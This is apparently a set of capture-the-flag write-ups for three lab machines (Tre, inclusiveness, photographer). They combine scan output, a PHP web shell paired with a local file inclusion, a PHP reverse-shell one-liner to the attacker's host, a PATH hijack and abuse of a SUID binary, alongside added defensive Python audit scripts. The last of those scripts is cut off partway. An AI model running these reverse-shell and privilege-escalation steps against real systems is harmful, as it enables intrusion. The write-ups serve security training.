+ Start Time:         2022-08-01 13:06:44 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: a4, size: 5a56bc0e14dfe, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ Default account found for 'Restricted Content' at /system/ (ID 'admin', PW 'admin'). Generic account discovered..
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ X-XSS-Protection header has been set to disable XSS Protection. There is unlikely to be a good reason for this.
+ 7941 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2022-08-01 13:07:18 (GMT8) (34 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

```
#### Here the credentials for /system were found to be admin admin
dirb
```
└─$ dirb "http://192.168.146.77/" /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Aug  1 14:10:44 2022
URL_BASE: http://192.168.146.77/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.146.77/ ----
==> DIRECTORY: http://192.168.146.77/cms/
==> DIRECTORY: http://192.168.146.77/mantisbt/
+ http://192.168.146.77/server-status (CODE:403|SIZE:279)
+ http://192.168.146.77/system (CODE:401|SIZE:461)

---- Entering directory: http://192.168.146.77/cms/ ----
==> DIRECTORY: http://192.168.146.77/cms/cache/
==> DIRECTORY: http://192.168.146.77/cms/core/
==> DIRECTORY: http://192.168.146.77/cms/custom/
==> DIRECTORY: http://192.168.146.77/cms/extensions/
==> DIRECTORY: http://192.168.146.77/cms/site/
==> DIRECTORY: http://192.168.146.77/cms/templates/
==> DIRECTORY: http://192.168.146.77/cms/vendor/

---- Entering directory: http://192.168.146.77/mantisbt/ ----
==> DIRECTORY: http://192.168.146.77/mantisbt/admin/
==> DIRECTORY: http://192.168.146.77/mantisbt/api/
==> DIRECTORY: http://192.168.146.77/mantisbt/config/
==> DIRECTORY: http://192.168.146.77/mantisbt/core/
==> DIRECTORY: http://192.168.146.77/mantisbt/css/
==> DIRECTORY: http://192.168.146.77/mantisbt/doc/
==> DIRECTORY: http://192.168.146.77/mantisbt/fonts/
==> DIRECTORY: http://192.168.146.77/mantisbt/images/
==> DIRECTORY: http://192.168.146.77/mantisbt/js/
==> DIRECTORY: http://192.168.146.77/mantisbt/lang/
==> DIRECTORY: http://192.168.146.77/mantisbt/library/
==> DIRECTORY: http://192.168.146.77/mantisbt/plugins/
==> DIRECTORY: http://192.168.146.77/mantisbt/scripts/
==> DIRECTORY: http://192.168.146.77/mantisbt/vendor/

---- Entering directory: http://192.168.146.77/cms/core/ ----
==> DIRECTORY: http://192.168.146.77/cms/core/admin/
==> DIRECTORY: http://192.168.146.77/cms/core/feeds/
==> DIRECTORY: http://192.168.146.77/cms/core/inc/
---- Entering directory: http://192.168.146.77/cms/core/admin/ ----
==> DIRECTORY: http://192.168.146.77/cms/core/admin/ajax/
==> DIRECTORY: http://192.168.146.77/cms/core/admin/css/
==> DIRECTORY: http://192.168.146.77/cms/core/admin/email/
==> DIRECTORY: http://192.168.146.77/cms/core/admin/images/
==> DIRECTORY: http://192.168.146.77/cms/core/admin/js/
==> DIRECTORY: http://192.168.146.77/cms/core/admin/layouts/
==> DIRECTORY: http://192.168.146.77/cms/core/admin/modules/
==> DIRECTORY: http://192.168.146.77/cms/core/admin/pages/
```

nikto

```

┌──(aaron㉿aacai)-[~/Desktop/Tre]
└─$ nikto -h http://192.168.146.77:8082
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.146.77
+ Target Hostname:    192.168.146.77
+ Target Port:        8082
+ Start Time:         2022-08-01 13:08:06 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.14.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7917 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2022-08-01 13:08:19 (GMT8) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

```
### Web page information gathering
Visiting port 80 directly shows a picture of bamboo

![Img](../FILES/Tre/img-20220801133805.png)

/cms is the home page of a blog
![Img](../FILES/Tre/img-20220801134225.png)
adminer.php is a database login page
![Img](../FILES/Tre/img-20220801135523.png)

Entering the admin / admin credentials at /system gets us past the basic auth to an application login page
![Img](../FILES/Tre/img-20220801133840.png)
Trying to register: there is no field for a password; the site wants to send a confirmation email instead
![Img](../FILES/Tre/img-20220801134841.png)
The forgot-password flow also requires an email address
![Img](../FILES/Tre/img-20220801134849.png)
Time to try something else

Run nikto against the /system directory
```
└─$ nikto -h "http://192.168.146.77/system"
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.146.77
+ Target Hostname:    192.168.146.77
+ Target Port:        80
+ Start Time:         2022-08-01 13:40:20 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Default account found for 'Restricted Content' at /system/ (ID 'admin', PW 'admin'). Generic account discovered..
+ Root page / redirects to: http://192.168.146.77/system/login_page.php
+ OSVDB-3268: /system/scripts/: Directory indexing found.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /system/config/: Directory indexing found.
+ /system/config/: Configuration information may be available remotely.
+ Cookie MANTIS_STRING_COOKIE created without the httponly flag
+ OSVDB-3268: /system/doc/: Directory indexing found.
+ OSVDB-48: /system/doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3268: /system/css/: Directory indexing found.
+ OSVDB-3092: /system/css/: This might be interesting...
+ OSVDB-3268: /system/library/: Directory indexing found.
+ OSVDB-3092: /system/library/: This might be interesting...
+ OSVDB-3268: /system/images/: Directory indexing found.
+ OSVDB-3268: /system/api/soap/: Directory indexing found.
+ /system/composer.json: PHP Composer configuration file reveals configuration information - https://getcomposer.org/
+ /system/composer.lock: PHP Composer configuration file reveals configuration information - https://getcomposer.org/
+ 8751 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2022-08-01 13:40:39 (GMT8) (19 seconds)
---------------------------------------------------------------------------
```
The MANTIS_STRING_COOKIE cookie and the /mantisbt path identify the application as MantisBT. The Admin Guide under /doc gives the version as 2.0
![Img](../FILES/Tre/img-20220801135102.png)
A Google search for exploits against this version turned up nothing relevant

![Img](../FILES/Tre/img-20220801135134.png)

Browse /mantisbt/config/ (directory indexing is on, as nikto noted)
![Img](../FILES/Tre/img-20220801144836.png)
There is a .txt file

Opening it reveals the database password!
![Img](../FILES/Tre/img-20220801144900.png)

Logging in with it (through the adminer.php page found earlier) succeeds
![Img](../FILES/Tre/img-20220801144935.png)
Look at the user table
![Img](../FILES/Tre/img-20220801145052.png)
It gives us a password
## Gaining a foothold
Log in with SSH
```
└─$ ssh tre@192.168.146.77
tre@tre:~$ ls
tre@tre:~$ id
uid=1000(tre) gid=1000(tre) groups=1000(tre),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
tre@tre:~$ sudo -l
Matching Defaults entries for tre on tre:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tre may run the following commands on tre:
    (ALL) NOPASSWD: /sbin/shutdown

```
sudo -l shows that we can run /sbin/shutdown as root without a password

Use pspy to watch the processes on the system

![Img](../FILES/Tre/img-20220801153305.png)

The system keeps running check-system; look at that file
```
tre@tre:/tmp$ ls -al /usr/bin/check-system
-rw----rw- 1 root root 135 May 12  2020 /usr/bin/check-system
tre@tre:/tmp$ cat /usr/bin/check-system
DATE=`date '+%Y-%m-%d %H:%M:%S'`
echo "Service started at ${DATE}" | systemd-cat -p info

while :
do
	echo "Checking...";
	sleep 1;
done
tre@tre:/tmp$

```
The script is owned by root and executed by a root service, yet its mode is -rw----rw-: world-writable. Edit it and insert a reverse-shell one-liner
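The listing above is the whole privilege-escalation bug: a root-owned script that a root service runs at boot, with a mode that lets every user on the box rewrite it. The Python audit below is an added example, not part of the original writeup and not tooling from the box. It generalises the finding: walk a systemd unit directory, pull every absolute path out of the Exec* lines (both the interpreter and the script it runs, because check-system is not itself executable and so must be invoked via sh), and flag any target a non-root user could modify. The unit directory, unit file and script in build_demo are constructed for the demonstration (Tre's real unit file was never shown); on a live host, point audit_units at /etc/systemd/system.

```python
"""Audit systemd units for Exec* targets that a non-root user can modify.

Added example, not from the Tre writeup. The unit content in build_demo is
constructed; only the mode -rw----rw- (0o606) is taken from the box.
"""
import os
import re
import stat
import tempfile

# Any Exec* directive (ExecStart, ExecStartPre, ExecStop, ...) holds a command line.
_EXEC_RE = re.compile(r"^Exec\w+=\s*(.*)$")


def exec_targets(unit_text):
    """Return every absolute path named on an Exec* line of a unit file.

    systemd's executable prefixes ('-', '@', '+', '!', ':') are stripped.
    Both the interpreter and the script it is handed are returned, since a
    writable script is as exploitable as a writable binary.
    """
    paths = []
    for line in unit_text.splitlines():
        m = _EXEC_RE.match(line.strip())
        if not m:
            continue
        for tok in m.group(1).split():
            tok = tok.lstrip("-@+!:")
            if tok.startswith("/"):
                paths.append(tok)
    return paths


def modifiable_by_non_root(path):
    """Reason string if someone other than root could change `path`, else None."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return "missing: whoever can write the parent directory can create it"
    mode = st.st_mode
    if mode & stat.S_IWOTH:
        return "world-writable (%s)" % stat.filemode(mode)
    if mode & stat.S_IWGRP and st.st_gid != 0:
        return "group-writable by gid %d (%s)" % (st.st_gid, stat.filemode(mode))
    if st.st_uid != 0:
        return "owned by uid %d rather than root" % st.st_uid
    return None


def audit_units(unit_dir):
    """Map unit file name -> [(target, reason)] for every exploitable target."""
    findings = {}
    for name in sorted(os.listdir(unit_dir)):
        if not name.endswith(".service"):
            continue
        with open(os.path.join(unit_dir, name)) as fh:
            targets = exec_targets(fh.read())
        bad = [(t, modifiable_by_non_root(t)) for t in targets]
        bad = [(t, r) for t, r in bad if r]
        if bad:
            findings[name] = bad
    return findings


def build_demo():
    """Constructed fixture: a unit running a world-writable script through sh."""
    root = tempfile.mkdtemp()
    script = os.path.join(root, "check-system")
    with open(script, "w") as fh:
        fh.write('while :; do echo "Checking..."; sleep 1; done\n')
    os.chmod(script, 0o606)  # -rw----rw-, the mode seen on Tre
    with open(os.path.join(root, "check-system.service"), "w") as fh:
        fh.write("[Service]\nExecStart=/bin/sh %s\n" % script)
    return root, script


if __name__ == "__main__":
    unit_dir, _ = build_demo()
    for unit, problems in audit_units(unit_dir).items():
        for target, reason in problems:
            print("%s: %s is %s" % (unit, target, reason))
```

The same check applies to cron entries and to anything listed in /etc/rc.local; the fix on Tre would be `chmod 700 /usr/bin/check-system` (or 755 with no write bit for group/other) so that only root can change what root executes.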
![Img](../FILES/Tre/img-20220801162856.png)

Then reboot with sudo shutdown -r now; on boot the service runs the modified script as root and the reverse shell connects back

![Img](../FILES/Tre/img-20220801163035.png)
```
root@tre:/# cd ~
cd ~
root@tre:/root# ls
ls
root.txt
root@tre:/root# cat root.txt
cat root.txt
{SunCSR_Tr3_Viet_Nam_2020}
root@tre:/root# ip a
ip a
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:91:d4:a8 brd ff:ff:ff:ff:ff:ff
    inet 192.168.146.77/24 brd 192.168.146.255 scope global dynamic ens33
       valid_lft 71838sec preferred_lft 71838sec
    inet6 fe80::20c:29ff:fe91:d4a8/64 scope link 
       valid_lft forever preferred_lft forever
root@tre:/root# whoami
whoami
root
root@tre:/root# id
id
uid=0(root) gid=0(root) groups=0(root)
root@tre:/root# 

```

Root shell obtained
--------------------------------------------------------------------------------
/Target Notes/inclusiveness.md:
--------------------------------------------------------------------------------
# inclusiveness
## Information gathering
### Port enumeration
```
┌──(aaron㉿aacai)-[~/Desktop/inclusiveness]
└─$ sudo nmap -p- 192.168.146.57
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 19:29 HKT
Nmap scan report for 192.168.146.57
Host is up (0.00016s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:CC:0B:D9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 10.67 seconds

└─$ sudo nmap -p21,22,80 -sV -A 192.168.146.57
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 19:30 HKT
Nmap scan report for 192.168.146.57
Host is up (0.00032s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Feb 08  2020 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.146.50
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
|   256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
|_  256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:CC:0B:D9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 192.168.146.57

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.75 seconds

```
### FTP enumeration
The port scan showed that anonymous FTP login is allowed; log in anonymously and see whether anything can be downloaded
```
└─$ ftp 192.168.146.57
Connected to 192.168.146.57.
220 (vsFTPd 3.0.3)
Name (192.168.146.57:aaron): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||28415|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Feb 08  2020 pub
226 Directory send OK.
ftp> exit
221 Goodbye.

```
Nothing to download. Note, though, that pub is drwxrwxrwx, so the anonymous user can write to it (nmap's ftp-anon script flagged it as writeable); this matters later
### Web enumeration
dirsearch finds a robots.txt (served under several names)
```
[19:35:20] 200 -   59B  - /.robots.txt
[19:35:37] 200 -   10KB - /index.html
[19:35:40] 200 -  626B  - /manual/index.html
[19:35:44] 200 -   59B  - /public_html/robots.txt
[19:35:45] 200 -   59B  - /robots.txt
[19:35:45] 200 -   59B  - /robots.txt.dist

```

![Img](../FILES/inclusiveness/img-20220814193612.png)
But the response tells us we are not a search engine, so send a search-engine User-Agent instead

```
curl -s --user-agent Googlebot http://192.168.146.57/robots.txt
```
![Img](../FILES/inclusiveness/img-20220814193752.png)

Now it reveals a Disallow entry

![Img](../FILES/inclusiveness/img-20220814193827.png)
On that page, switching the language appends lang=en.php to the URL, so the parameter is a file name; fuzz it
![Img](../FILES/inclusiveness/img-20220814194154.png)

There is indeed an LFI; read /etc/passwd directly

![Img](../FILES/inclusiveness/img-20220814194223.png)
Recall that the FTP pub directory is writable. Write a small PHP file locally that passes a cmd parameter to system(), and upload it to the target over FTP
![Img](../FILES/inclusiveness/img-20220814194443.png)
![Img](../FILES/inclusiveness/img-20220814194510.png)
Our shell.php is now on the box

Next, find where the FTP root lives on disk. The configuration normally sits under /etc, and nmap told us the server is vsftpd, so read its config file through the LFI
![Img](../FILES/inclusiveness/img-20220814194711.png)
The FTP root is /var/ftp, so we can include the uploaded file through the LFI and run commands
![Img](../FILES/inclusiveness/img-20220814194807.png)
## Gaining a foothold
Send a PHP reverse shell through the web shell (URL-encoded as the cmd value)
```
php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.146.50%22%2C4444%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
```
Decoded, that is `php -r '$sock=fsockopen("192.168.146.50",4444);exec("sh <&3 >&3 2>&3");'`
![Img](../FILES/inclusiveness/img-20220814194920.png)

We get a shell as www-data

Check for files with the SUID bit set
![Img](../FILES/inclusiveness/img-20220814195112.png)

In that directory there is a rootshell.c, the source from which rootshell was built with gcc

![Img](../FILES/inclusiveness/img-20220814195311.png)
![Img](../FILES/inclusiveness/img-20220814195433.png)

Reading the code:

The binary runs whoami and, if the output is tom, escalates privileges; otherwise it just prints the current user. Because whoami is invoked by bare name, the binary finds it through PATH, and PATH is controlled by whoever runs the binary
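As an added illustration (not the writeup's code, and not the rootshell.c source, which is visible only in the screenshots), the Python below models the lookup that system()/execvp perform when a program runs `whoami` by bare name, shows how prepending a directory to PATH redirects it, and contrasts that with taking the identity from getuid(), which is what a SUID binary should do. The fake whoami is constructed in a temp directory; check_insecure approximates the check the writeup describes (output of whoami compared with "tom").

```python
"""PATH hijack against a privileged program that shells out to `whoami`.

Added example, not from the inclusiveness writeup. The fake whoami below
is constructed in a temporary directory, mirroring the /tmp/whoami trick.
"""
import os
import pwd
import subprocess
import tempfile


def resolve(name, path):
    """Mimic execvp(3)/system(3): first PATH entry holding an executable `name`.

    A name containing '/' is used as given, which is why an absolute path
    such as /usr/bin/whoami is immune to PATH poisoning.
    """
    if "/" in name:
        return name if os.access(name, os.X_OK) else None
    for d in path.split(os.pathsep):
        cand = os.path.join(d or ".", name)
        if os.path.isfile(cand) and os.access(cand, os.X_OK):
            return cand
    return None


def check_insecure(path):
    """The check /rootshell appears to make: does `whoami` print 'tom'?

    Runs whichever `whoami` PATH resolution picks, exactly as system()
    would, so a caller-controlled PATH decides the answer.
    """
    prog = resolve("whoami", path)
    if prog is None:
        return False
    out = subprocess.run([prog], capture_output=True, text=True).stdout
    return out.strip() == "tom"


def check_secure():
    """Identity from the kernel, not from a child process found via PATH.

    Inside a SUID binary getuid() is the *real* uid of the invoking user,
    so nothing the user places on disk can change the answer.
    """
    return pwd.getpwuid(os.getuid()).pw_name == "tom"


def build_fake_whoami():
    """Constructed: a directory holding the same fake whoami the writeup uses."""
    d = tempfile.mkdtemp()
    fake = os.path.join(d, "whoami")
    with open(fake, "w") as fh:
        fh.write("#!/bin/sh\nprintf tom\n")
    os.chmod(fake, 0o755)
    return d


def demo():
    """Return (hijacked_result, secure_result) for a PATH=/tmp:$PATH style attack."""
    d = build_fake_whoami()
    hijacked_path = d + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")
    return check_insecure(hijacked_path), check_secure()


if __name__ == "__main__":
    hijacked, secure = demo()
    print("whoami-based check passes under poisoned PATH:", hijacked)
    print("getuid-based check passes:", secure)
```

The C equivalent of check_secure is `getpwuid(getuid())`, or simply comparing `getuid()` with tom's uid; if a SUID program must run external commands, it should reset PATH to a fixed value and call them by absolute path.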
So create a whoami in /tmp that claims we are tom
```
www-data@inclusiveness:/tmp$ echo "printf "tom"" > whoami
echo "printf "tom"" > whoami
www-data@inclusiveness:/tmp$ ls
ls
whoami
www-data@inclusiveness:/tmp$ chmod +x whoami
chmod +x whoami
www-data@inclusiveness:/tmp$ 
```
Then put /tmp at the front of PATH
```
www-data@inclusiveness:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@inclusiveness:/tmp$ 
```


Then run /rootshell

![Img](../FILES/inclusiveness/img-20220814200330.png)

Privilege escalation successful
![Img](../FILES/inclusiveness/img-20220814200354.png)
--------------------------------------------------------------------------------
/Target Notes/photographer.md:
--------------------------------------------------------------------------------
# photographer
## Information gathering
### Port enumeration
As usual, start with a full nmap port scan
```
└─$ sudo nmap -p- 192.168.146.54
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 15:59 HKT
Nmap scan report for 192.168.146.54
Host is up (0.00015s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8000/tcp open  http-alt
MAC Address: 00:0C:29:6F:9C:50 (VMware)
```
Enumerate the open ports in detail
```
└─$ sudo nmap -p80,139,445,8000 -sV -A 192.168.146.54
[sudo] password for aaron: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 16:23 HKT
Nmap scan report for 192.168.146.54
Host is up (0.00030s latency).

PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: daisa ahomi
|_http-open-proxy: Proxy might be redirecting requests
|_http-generator: Koken 0.22.24
MAC Address: 00:0C:29:6F:9C:50 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: PHOTOGRAPHER

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s
| smb2-time: 
|   date: 2022-08-14T08:23:48
|_  start_date: N/A
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: photographer
|   NetBIOS computer name: PHOTOGRAPHER\x00
|   Domain name: \x00
|   FQDN: photographer
|_  System time: 2022-08-14T04:23:48-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

TRACEROUTE
HOP RTT     ADDRESS
1   0.31 ms 192.168.146.54

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.90 seconds

```
Four ports are open. The http-generator header on port 8000 already names the application there as Koken 0.22.24. Move on to web enumeration
### Web enumeration
Port 80 is the home page of a blog
![Img](../FILES/photographer/img-20220814162851.png)
Enumerate paths with dirsearch
```
└─$ cat dirsearch_res.txt| grep -v "403"
[16:29:57] Starting: 
[16:30:08] 200 -    1KB - /assets/
[16:30:08] 301 -  317B  - /assets  ->  http://192.168.146.54/assets/
[16:30:15] 301 -  317B  - /images  ->  http://192.168.146.54/images/
[16:30:15] 200 -    3KB - /images/
[16:30:15] 200 -    6KB - /index.html

```
The three directories above hold nothing but basic web assets

![Img](../FILES/photographer/img-20220814163238.png)
![Img](../FILES/photographer/img-20220814163242.png)

nikto does not turn up much either
```

┌──(aaron㉿aacai)-[~/Desktop/photographer]
└─$ nikto -h "http://192.168.146.54/"
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.146.54
+ Target Hostname:    192.168.146.54
+ Target Port:        80
+ Start Time:         2022-08-14 16:33:27 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 164f, size: 5aaf04d7cd1a0, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2022-08-14 16:34:18 (GMT8) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

```

---
Port 8000
```
┌──(aaron㉿aacai)-[~/Desktop/photographer]
└─$ cat 8000.txt| grep "200"
[16:40:50] 200 - 1020B - /admin/
[16:40:50] 200 - 1020B - /admin/?/login
[16:40:50] 200 - 1020B - /admin/index.html
[16:40:56] 200 -  114B - /app/
[16:40:56] 200 -  114B - /app/cache/
[16:40:56] 200 -  114B - /app/logs/
[16:41:02] 200 -   4KB - /content/
[16:41:07] 200 -   3KB - /error/
[16:41:13] 200 -   4KB - /index.php
[16:42:01] 200 -   4KB - /wp-content/plugins/jrss-widget/proxy.php?url=

```

An admin back end
![Img](../FILES/photographer/img-20220814164633.png)
### SMB enumeration
![Img](../FILES/photographer/img-20220814164733.png)

smbclient lists a share named smbashare

![Img](../FILES/photographer/img-20220814164817.png)

When I tried to connect it complained that there were not enough backslashes, so I added two more

![Img](../FILES/photographer/img-20220814164834.png)

Connected

![Img](../FILES/photographer/img-20220814164900.png)

Download mailsent.txt

![Img](../FILES/photographer/img-20220814164928.png)

It is an email about Daisa. The login page wants an email address, so try this account

![Img](../FILES/photographer/img-20220814165024.png)

Logged in

The home page also states that the site is built with Koken

![Img](../FILES/photographer/img-20220814165123.png)

searchsploit shows an authenticated arbitrary file upload vulnerability for Koken

![Img](../FILES/photographer/img-20220814165254.png)

In the bottom right there is an "import content" button; intercept the upload with Burp and use it to upload our file
![Img](../FILES/photographer/img-20220814170640.png)

## Gaining a foothold
Once the upload completes we have a shell
![Img](../FILES/photographer/img-20220814170846.png)
python is present on the box, so use it to upgrade to an interactive TTY
![Img](../FILES/photographer/img-20220814170934.png)
### Privilege escalation
List the files with the SUID bit set
```
find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/php7.2
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/chfn
/bin/ping
/bin/fusermount
/bin/mount
/bin/ping6
/bin/umount
/bin/su
```
/usr/bin/php7.2 stands out: a SUID-root interpreter executes whatever code an unprivileged user feeds it with root's effective uid, so we can escalate through it
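Added example (not from the writeup): a Python pass over `find / -perm -u=s -type f` results that separates the expected SUID helpers (passwd, su, mount and friends) from interpreters, which hand a root shell to anyone who can run them. The interpreter list and the php7.2 to php version-suffix stripping are this example's own assumptions, and build_demo constructs its files in a temp directory; on a real host, feed walk_suid a root such as /usr or the find output to suid_findings.

```python
"""Classify setuid/setgid files: expected helpers versus instant root shells.

Added example, not from the photographer writeup. DANGEROUS_WHEN_SUID and
the version-suffix handling are assumptions of this example.
"""
import os
import re
import stat
import tempfile

# Interpreters and other programs whose setuid-root copy is a direct root shell
# (they can call setuid(0)/exec or run arbitrary code for the invoking user).
DANGEROUS_WHEN_SUID = {
    "php", "python", "perl", "ruby", "node", "lua", "bash", "sh", "dash", "zsh",
    "env", "find", "vim", "nano", "awk", "gawk",
}
_VERSION_SUFFIX = re.compile(r"[0-9.]+$")   # php7.2 -> php, python3 -> python


def canonical_name(path):
    """Basename with any trailing version stripped: /usr/bin/php7.2 -> php."""
    return _VERSION_SUFFIX.sub("", os.path.basename(path))


def suid_findings(paths):
    """Return [(path, severity)] for regular files with setuid or setgid set.

    severity is 'critical' for a known interpreter/editor and 'review' for
    everything else, which still deserves a look but is usually expected.
    """
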